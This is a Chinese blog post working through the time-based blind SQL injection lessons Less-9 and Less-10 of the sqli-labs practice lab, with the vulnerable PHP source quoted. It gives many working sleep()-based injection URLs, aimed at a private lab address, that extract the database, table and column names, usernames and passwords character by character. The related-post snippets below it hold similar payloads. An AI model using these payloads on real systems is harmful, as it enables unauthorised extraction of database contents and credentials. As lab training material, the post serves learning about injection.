Sqli-labs Less09-10 延时型sql盲注 - GET

最新推荐文章于 2022-07-14 09:06:13 发布
最新推荐文章于 2022-07-14 09:06:13 发布
阅读量489 收藏 3
点赞数
分类专栏: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Kevinhanser/article/details/81519272
版权

本文记录 SQL 注入的学习过程,资料为 SQLi

SQLi 博客目录

Less - 09: GET - Blind - Time based - Single Quotes

  1. 测试漏洞

    本关我们从标题就可以看到《基于时间-单引号》,所以很明显的这关要我们利用延时注入进行,同时id 参数进行的是’ 的处理。这里我们大致的将延时注入的方法演示一次。

    这里用sleep()函数。

    源代码

    $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);

    使用 ’ 进行注入

    这里因为我们利用的是时间的延迟,贴图就没有意义了,这里只写 payload 了

    (正确的时候直接返回,不正确的时候等待 5 秒钟,只贴正确的)

  2. 延时注入猜测数据库

    (正确的时候直接返回,不正确的时候等待 5 秒钟,只贴正确的)

    http://10.10.10.137/sqli-labs/Less-9/?id=1'and If(ascii(substr(database(),1,1))=115,1,sleep(5))--+

# 得到第一位是s (ascii 码是115)

http://10.10.10.137/sqli-labs/Less-9/?id=1'and If(ascii(substr(database(),2,1))=101,1,sleep(5))--+

# 得到第一位是e (ascii 码是101)

    得出结果,数据库名字是 security

  3. 延时注入猜测security 的数据表

    (正确的时候直接返回,不正确的时候等待 5 秒钟,只贴正确的)

    http://10.10.10.137/sqli-labs/Less-9/?id=1'and If(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))=101,1,sleep(5))--+

# 得到第一位 e

http://10.10.10.137/sqli-labs/Less-9/?id=1'and If(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),2,1))=109,1,sleep(5))--+

# 得到第二位 m

    猜测第一个数据表的第一位是e,…依次类推,得到 emails

    http://10.10.10.137/sqli-labs/Less-9/?id=1'and If(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 1,1),1,1))=114,1,sleep(5))--+

# 得到第一位 r

http://10.10.10.137/sqli-labs/Less-9/?id=1'and If(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 1,1),2,1))=101,1,sleep(5))--+

# 得到第二位 e

    猜测第二个数据表的第一位是 r,… 依次类推,得到 referers

    得到所有的数据表 emails, referers, uagents, users

  4. 延时注入猜测 users 表的列

    (正确的时候直接返回,不正确的时候等待 5 秒钟,只贴正确的)

    http://10.10.10.137/sqli-labs/Less-9/?id=1'and If(ascii(substr((select column_name from information_schema.columns where table_name='users' limit 0,1),1,1))=117,1,sleep(5))--+

# 得到第一位 u

http://10.10.10.137/sqli-labs/Less-9/?id=1'and If(ascii(substr((select column_name from information_schema.columns where table_name='users' limit 0,1),2,1))=115,1,sleep(5))--+

# 得到第二位 s

    猜测第一个数据表的第一位是 u,…依次类推,得到 user_id

    http://10.10.10.137/sqli-labs/Less-9/?id=1'and If(ascii(substr((select column_name from information_schema.columns where table_name='users' limit 4,1),1,1))=112,1,sleep(5))--+

# 得到第一位 p

http://10.10.10.137/sqli-labs/Less-9/?id=1'and If(ascii(substr((select column_name from information_schema.columns where table_name='users' limit 4,1),2,1))=97,1,sleep(5))--+

# 得到第二位 a

    猜测第一个数据表的第一位是 p,…依次类推,得到 password

  5. 延时注入猜测 username 的值

    http://10.10.10.137/sqli-labs/Less-9/?id=1'and If(ascii(substr((select username from users limit 0,1),1,1))=68,1,sleep(5))--+

# 得到 username 第一位 D

    以此类推,我们得到数据库username,password 的所有内容

    http://10.10.10.137/sqli-labs/Less-9/?id=1'and If(ascii(substr((select password from users limit 0,1),2,1))=117,1,sleep(5))--+

    以上的过程就是我们利用 sleep() 函数注入的整个过程,当然了可以离开 BENCHMARK() 函数进行注入,这里可以自行进行测试。我们这里就不进行演示了。

Less - 10: GET - Bind - Time based - Double Quotes

  1. 测试漏洞

    本关我们从标题就可以看到《基于时间-双引号》,所以很明显的这关要我们利用延时注入进行,同时 id 参数进行的是 ” 的处理。和less9 的区别就在于单引号(’)变成了(”)

    这里用sleep()函数。

    源代码

    $id = '"'.$id.'"';
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);

    使用 ” 进行注入

    这里因为我们利用的是时间的延迟,贴图就没有意义了,这里只写 payload 了

    (正确的时候直接返回,不正确的时候等待 5 秒钟,只贴正确的)

  2. 猜测数据库

    (正确的时候直接返回,不正确的时候等待 5 秒钟,只贴正确的)

    http://10.10.10.137/sqli-labs/Less-10/?id=1"and If(ascii(substr(database(),1,1))=115,1,sleep(5))--+

# 得到第一位是s (ascii 码是115)

http://10.10.10.137/sqli-labs/Less-10/?id=1"and If(ascii(substr(database(),2,1))=101,1,sleep(5))--+

# 得到第一位是e (ascii 码是101)

    得出结果,数据库名字是 security

  3. 猜测security 的数据表

    (正确的时候直接返回,不正确的时候等待 5 秒钟,只贴正确的)

    http://10.10.10.137/sqli-labs/Less-10/?id=1"and If(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))=101,1,sleep(5))--+

# 得到第一位 e

http://10.10.10.137/sqli-labs/Less-10/?id=1"and If(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),2,1))=109,1,sleep(5))--+

# 得到第二位 m

    猜测第一个数据表的第一位是e,…依次类推,得到 emails

    http://10.10.10.137/sqli-labs/Less-10/?id=1"and If(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 1,1),1,1))=114,1,sleep(5))--+

# 得到第一位 r

http://10.10.10.137/sqli-labs/Less-10/?id=1"and If(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 1,1),2,1))=101,1,sleep(5))--+

# 得到第二位 e

    猜测第二个数据表的第一位是 r,… 依次类推,得到 referers

    得到所有的数据表 emails, referers, uagents, users

  4. 猜测 users 表的列

    (正确的时候直接返回,不正确的时候等待 5 秒钟,只贴正确的)

    http://10.10.10.137/sqli-labs/Less-10/?id=1"and If(ascii(substr((select column_name from information_schema.columns where table_name='users' limit 0,1),1,1))=117,1,sleep(5))--+

# 得到第一位 u

http://10.10.10.137/sqli-labs/Less-10/?id=1"and If(ascii(substr((select column_name from information_schema.columns where table_name='users' limit 0,1),2,1))=115,1,sleep(5))--+

# 得到第二位 s

    猜测第一个数据表的第一位是 u,…依次类推,得到 user_id

    http://10.10.10.137/sqli-labs/Less-10/?id=1"and If(ascii(substr((select column_name from information_schema.columns where table_name='users' limit 4,1),1,1))=112,1,sleep(5))--+

# 得到第一位 p

http://10.10.10.137/sqli-labs/Less-10/?id=1"and If(ascii(substr((select column_name from information_schema.columns where table_name='users' limit 4,1),2,1))=97,1,sleep(5))--+

# 得到第二位 a

    猜测第一个数据表的第一位是 p,…依次类推,得到 password

  5. 猜测 username 的值

    http://10.10.10.137/sqli-labs/Less-10/?id=1"and If(ascii(substr((select username from users limit 0,1),1,1))=68,1,sleep(5))--+

# 得到 username 第一位 D

    以此类推,我们得到数据库username,password 的所有内容

    http://10.10.10.137/sqli-labs/Less-10/?id=1"and If(ascii(substr((select password from users limit 0,1),2,1))=117,1,sleep(5))--+

    以上的过程就是我们利用 sleep() 函数注入的整个过程,当然了可以离开 BENCHMARK() 函数进行注入,这里可以自行进行测试。我们这里就不进行演示了。

网络安全打工人
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sqli-labs-master Less1-9通关代码详解
qq_42906381的博客
02-15 2666
sqli-labs 1-9 通关代码详细
Sqli-labs less 9
weixin_34049032的博客
08-11 163
Less-9 本关我们从标题就可以看到 《基于时间-单引号》,所以很明显的这关要我们利用延时注入进行,同时id参数进行的是 ' 的处理。这里我们大致的将延时注入的方法演示一次。 这里用sleep()函数。 这里因为我们利用的是时间的延迟,贴图就没有意义了,这里只写payload了:(正确的时候直接返回,不正确的时候等待5秒钟,只贴正确的) 猜测数据库: http://127.0.0.1/...
Sqli-LABS通关笔录-9[延时注入]
aiquan9342的博客
12-01 150
通过这个关卡 1.更快的掌握到了如何判断是否是延时注入 无论咋输入,都不行。当payload为: http://127.0.0.1/sql/Less-9/index.php?id=1' and sleep(10)--+ 回车,发现sleep(10)得到执行了。说明是可以注入的。并且是延时注入。那么就让我们来看看这个延时有什么与众不同吧。 这题也是...
Sqli-LABS通关笔录-8[延时注入]
aiquan9342的博客
11-29 141
通过该关卡我学习到了 1.if语句的三目运算符(其实说白了也就是php里的三位运算符) 2.sleep函数 3.substring函数(其实和substr一样) 4.limit的灵活运用 5. Start Study 先来科普延时注入知识吧。 延时注入方法很简单:就是利用IF的三目运算符使用substring函数来判断字符的ASCII码值,进而猜解出正确的内容。 ...
sqli-labs (less-9)
kukudeshuo的博客
03-08 1396
sqli-labs (less-9) 补充知识 本关将介绍与Boolean盲注非常相似的另一种注入方法——时间盲注。他与Boolean盲注的不同之处在于,时间注入是利用sleep()或benchmark()等函数让MySQL的执行时间变长。时间盲注多与IF(expr1,expr2,expr3)结合使用,此if语句含义是:如果expr1是TRUE,则IF()的返回值为expr2;否则返回值则为expr3。 例: if (length(database())>1,1,sleep(5)),这句语句的意思是查
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
phpstudy+靶场sqli-labs-master下载
最新发布
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
windows环境下安装sqli-labs
11-04
Windows 环境下安装 sqli-labs 详细教程 Windows Server 2012 环境下安装 sqli-labs 需要具备一定的基础知识和环境准备。在这里,我们将详细介绍如何在 Windows Server 2012 环境下安装 sqli-labs。 环境准备 在...
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
sqli-labs配置数据库sqli-labs的数据库文件
03-09
Unable to connect to the database: security sqli-labs通过docker安装时,缺少数据库文件,可以通过这个sql文件直接安装
sqli-labs(less-9)
不知名白帽的博客
07-14 961
sqli-labs(less-9)。less-9(时间盲注)
SQLi LABS Less 10 时间盲注
热门推荐
wangyuxiang946的博客
06-27 1万+
SQLi 第十关,SQLi-LABS Less-10SQLi-LABS Less 10SQLiLABS Less10SQLi Less 10
sqli-labs-less9
m0_68980215的博客
07-08 181
sql lesson9
sqli-labs Less-9
qq_42630215的博客
03-24 151
Less-9 Get - Blind -Time based -Single Quotes 原页面 基于时间的盲注 如果是正确的直接返回,错误的时候等待5秒钟。 1.猜测数据库: ?id=1’ and If(ascii(substr(database(),1,1))=115,1,sleep(5))–+ ?id=1’ and If(ascii(substr(database(),1,1))=1...
sqli-labs-master【Less-9/10
weixin_44352521的博客
12-18 307
Less-9 当我们输入的id值不管是什么数字,或者使用任何符号闭合,都会显示you are in…;由此可以判断,无论我们输入的id什么,数据交互完成以后目标网站没有错误和正确的页面回显,这就让我们很难判断,所以这就要用到我们的基于时间的盲注,那么什么是基于时间的盲注呢?基于时间的盲注就是通过页面返回时间来判断的一种方法,即代码存在sql注入漏洞,然而页面既不会回显数据,也不会回显错误信息,...
sqli-labs ————less -9
Fly_鹏程万里
05-11 1742
Less-9首先我们可以查看一下源代码:一方面:从标题中我们可以看到这是一个基于时间盲注的单引号注入另一方面:从之后的“print_r(mysql_error());”来看我们并不可以使用报错注入最后,我们可以看到可以通过' and 1=1 --+或者' or 1=1 --+来绕过既然如此,那么我就用延迟注入的方式来注入:猜解数据库:payload:http://192.168.11.136/sq...
SQL注入学习——时间盲注详解 sqli-labs(Less 9)
未完成的歌~的博客
09-01 4352
Less-9 基于时间的双引号盲注
sqli-labs Less-9 时间盲注
m0_63711447的博客
04-12 1025
使用的函数补充: if(condition,A,B)如果条件condition为true,则执行语句A,否则执行语句B eg.select if(1>2,3,4); 返回的结果为4(若是在MySQL命令行中使用,应先use xxx数据库) 可组合使用,当前数据库为security ...
SQLi-LABS Less-9&&Less-10
m0_64898960的博客
04-17 402
题目如下 由题目得知,其为基于时间的盲注 这里无论输入什么都会是回显出这个页面,是时间盲注没错了... 判断注入点,需要 “ ' ”来闭合1 ?id=1 and if(1,sleep(10),3)--+ ?id=1' and if(1,sleep(10),3)--+ ?id=1" and if(1,sleep(10),3)--+ ... (需要哪个来闭合网页就会缓慢10s) 判断数据库长度 ?id=1' and if(length(database())>5,1,sl.
PHP与Apache环境下部署SQL注入靶场sqli-labs指南
部署sqli-labs是一个实战训练过程,它不仅提供了丰富的SQL注入实例,还能帮助开发者熟悉如何防范此类攻击,是提升网络安全技能的实用工具。通过这个靶场,你将更深入理解Web应用程序安全的重要性,并掌握如何在实际...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值